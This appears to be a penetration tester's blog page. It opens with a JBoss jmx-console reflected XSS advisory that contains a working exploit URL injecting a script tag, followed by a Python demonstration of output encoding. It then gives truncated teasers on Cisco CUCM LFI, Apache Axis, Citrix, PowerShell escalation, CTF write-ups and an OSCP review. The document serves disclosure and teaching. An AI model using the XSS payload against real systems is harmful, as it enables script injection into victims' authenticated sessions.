
Reflected XSS in jmx-console HtmlAdaptor DatabasePersistencePlugin parameter

1) Description:
The DatabasePersistencePlugin parameter of the JBoss jmx-console HtmlAdaptor is vulnerable to reflected XSS. The value is echoed unencoded into an HTML input attribute, so a double quote in the value closes the attribute and the tag:
/jmx-console/HtmlAdaptor?DatabasePersistencePlugin

2) Exploit:
##############Request####################
https://abc.com:8080/jmx-console/HtmlAdaptor?DatabasePersistencePlugin=org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E&name=jboss.ejb%3aservice%3dEJBTimerService%2cpersistencePolicy%3ddatabase&action=updateAttributes&DataSource=jboss.jca%3aservice%3dDataSourceBinding%2cname%3dDefaultDS

############Response#####################
.............
 <input type="text" name="DatabasePersistencePlugin" value="org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin"><script>alert(1)</script>" >
................




3) Fixed version:
Versions after 4.0.2 are fixed


Note: exploiting this XSS requires authenticated access to the jmx-console.
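To make the attribute-context break-out concrete, here is an added example (my own code, not JBoss or jmx-console code). The two render_* functions are a constructed, minimal stand-in for the HtmlAdaptor form field that echoes the DatabasePersistencePlugin value into <input value="...">; the request URL is the one from the exploit above, and the host abc.com is the write-up's placeholder. It decodes the payload from the URL, renders it the vulnerable way and the encoded way, and then parses both responses the way a browser tokenizer would to show which one grew an extra <script> element.

```python
"""Reflected XSS in an HTML attribute: why the payload works and how
output encoding stops it.

Added example (not JBoss/jmx-console code). render_vulnerable and
render_fixed are a constructed stand-in for the HtmlAdaptor form field
that echoes DatabasePersistencePlugin into <input value="...">.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Request URL from the write-up (abc.com is the write-up's placeholder host).
EXPLOIT_URL = (
    "https://abc.com:8080/jmx-console/HtmlAdaptor?DatabasePersistencePlugin="
    "org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin"
    "%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E"
    "&name=jboss.ejb%3aservice%3dEJBTimerService%2cpersistencePolicy%3ddatabase"
    "&action=updateAttributes"
    "&DataSource=jboss.jca%3aservice%3dDataSourceBinding%2cname%3dDefaultDS"
)


def query_param(url, name):
    """Return the URL-decoded value of one query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(name, value):
    """Models the unfixed field: the value is concatenated raw into the
    attribute, so a double quote in it closes the attribute and the tag."""
    return '<input type="text" name="%s" value="%s" >' % (name, value)


def render_fixed(name, value):
    """Same field with HTML attribute encoding: & < > " ' become entities,
    so the value can neither close the attribute nor open a new tag."""
    return '<input type="text" name="%s" value="%s" >' % (
        name, html.escape(value, quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag and the attributes of its first occurrence."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        # HTMLParser has already entity-decoded attribute values here.
        self.attrs.setdefault(tag, dict(attrs))


def parse_markup(markup):
    """Tokenize a fragment like a browser would; returns (tags, attrs)."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.attrs


def injected_tags(markup, expected=("input",)):
    """Scanner-style check: any tag the template did not emit itself means
    the reflected input broke out of its attribute context."""
    tags, _ = parse_markup(markup)
    return [t for t in tags if t not in expected]


if __name__ == "__main__":
    payload = query_param(EXPLOIT_URL, "DatabasePersistencePlugin")
    print("decoded payload    :", payload)
    vuln = render_vulnerable("DatabasePersistencePlugin", payload)
    fixed = render_fixed("DatabasePersistencePlugin", payload)
    print("vulnerable response:", vuln)
    print("  injected tags    :", injected_tags(vuln))
    print("fixed response     :", fixed)
    print("  injected tags    :", injected_tags(fixed))
```

The parser-based check is the useful part for testing: grepping a response for the literal payload gives false positives when the server echoes it encoded, whereas counting start tags only flags a reflection that actually changed the DOM. Note that html.escape with quote=True is the right primitive for the attribute context only; text inside a <script> block or a URL attribute needs a different encoder.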

A short story of LFI and XSS on Cisco Unified Communications Manager Administrative Interface

Cisco Unified Communications Manager Administrative Web Interface Directory Traversal Vulnerability, CVE-2013-5528. (Feels happy when your exploit gets published on exploit-db.com: https://www.exploit-db.com/exploits/40887/)
In one of my pentest engagements I got to play with Cisco Unified Communications Manager Administrative Web Interface 8.x. Well, I was able to find LFI and XSS on one of the parameters.
After a few months I reported them to the Cisco team. A few mail exchanges were done, and the Cisco team told me that the vulnerability was previously disclosed as CVE-2013-5528.

The team says they have covered both the LFI and the XSS in the same advisory. Anyway, I took permission from the team to publish the exploit, and here I am publishing a write-up.


The vulnerability, CVE-2013-5528: a directory traversal vulnerability exists in the Cisco Unified Communications Manager Administrative Web Interface after authentication. The vulnerability is due to a failure to properly sanitize user-supplied input passed to …

Apache AXIS server pentest

In one of my pentest engagements the scope was to test a website abc.com/xyz/pqr.html and its mobile application.
The website seemed to be stronger, and I was not able to find any vulnerability, so I switched to the mobile application.
When I was testing the mobile application, I was doing code analysis and found a URL in the code that was invoking a web service. The URL is as follows.

https://abc.com/InstaWebServices/services/VersionCheck


Penetration testing of a Citrix server

"This was previously published at InfoSec Institute's Resources site."
Here I'll discuss how I did a pentest of a Citrix server in a lab network.


First let us understand Windows Terminal Services.

Windows Terminal Services (or Remote Desktop Services) is a feature of Windows Server 2003/2008 that allows multiple 'sessions' to be brokered to each enabled server, each running a server desktop or an embedded application.

Citrix is layered on top of Terminal Services (2003) or the RDS role (2008) and extends the functionality of this 'session based' access. It adds features such as ICA and its HDX feature set, which provide better application performance for interactive, graphical and WAN-based applications; resource-metric-based load balancing; centralized administration; geographically dispersed 'terminal server farm' design options; application publishing (individual apps as opposed to an app embedded in a desktop session); an…

File transfer and privilege escalation using Powershell

I was thinking of writing an article for some big brand. Eventually I got a notification on LinkedIn about a collaboration on PowerShell from Pentestmag.com (Poland).

I submitted an article on PowerShell, and it has been published by pentestmag.com.


The title of my article in the magazine is "Privilege escalation using PowerShell".

The magazine can be downloaded from the following URL (needs registration):

https://pentestmag.com/download/power-shell-for-penetration-testing/

CTF Hack Dat Kiwi Writeups

I participated in the CTF Hack Dat Kiwi, held on 19th and 20th November 2015. The CTF was organized by Abius X. Let me tell you, this was one of the finest CTFs that I've ever participated in.
Everything was awesome and organised.

I solved a few challenges and finished at 234th rank (http://hack.dat.kiwi/scoreboard, handle: Transformers).


SSL_Sniff 1 (50 points): A Wireshark capture file (dump.pcap) was given; it can be found at
https://www.dropbox.com/s/85f7kipys931m8n/dump.pcap?dl=0


MY OSCP REVIEW

About me: I am just a guy who has done a B.E. (Computer Engineering) and C.E.H., and I am doing vulnerability assessments for different clients in Mumbai.

Inspiration to do OSCP: If you want to read technical stuff only, then skip this paragraph. Like other guys, I thought that OSCP was one of the most difficult tasks in the world of IT security.
And yes, it is one of the most difficult missions you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing; I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and the time for completing the task was short.
So I asked a few questions in some group on Facebook about how I could learn more exploitation stuff.
There was a guy with the name Mr.WhiteW0rm who gave me a brilliant answer and recommended that I do OSCP. At that time I thought that though I wouldn't be able to do OSCP, at least I'd study in i…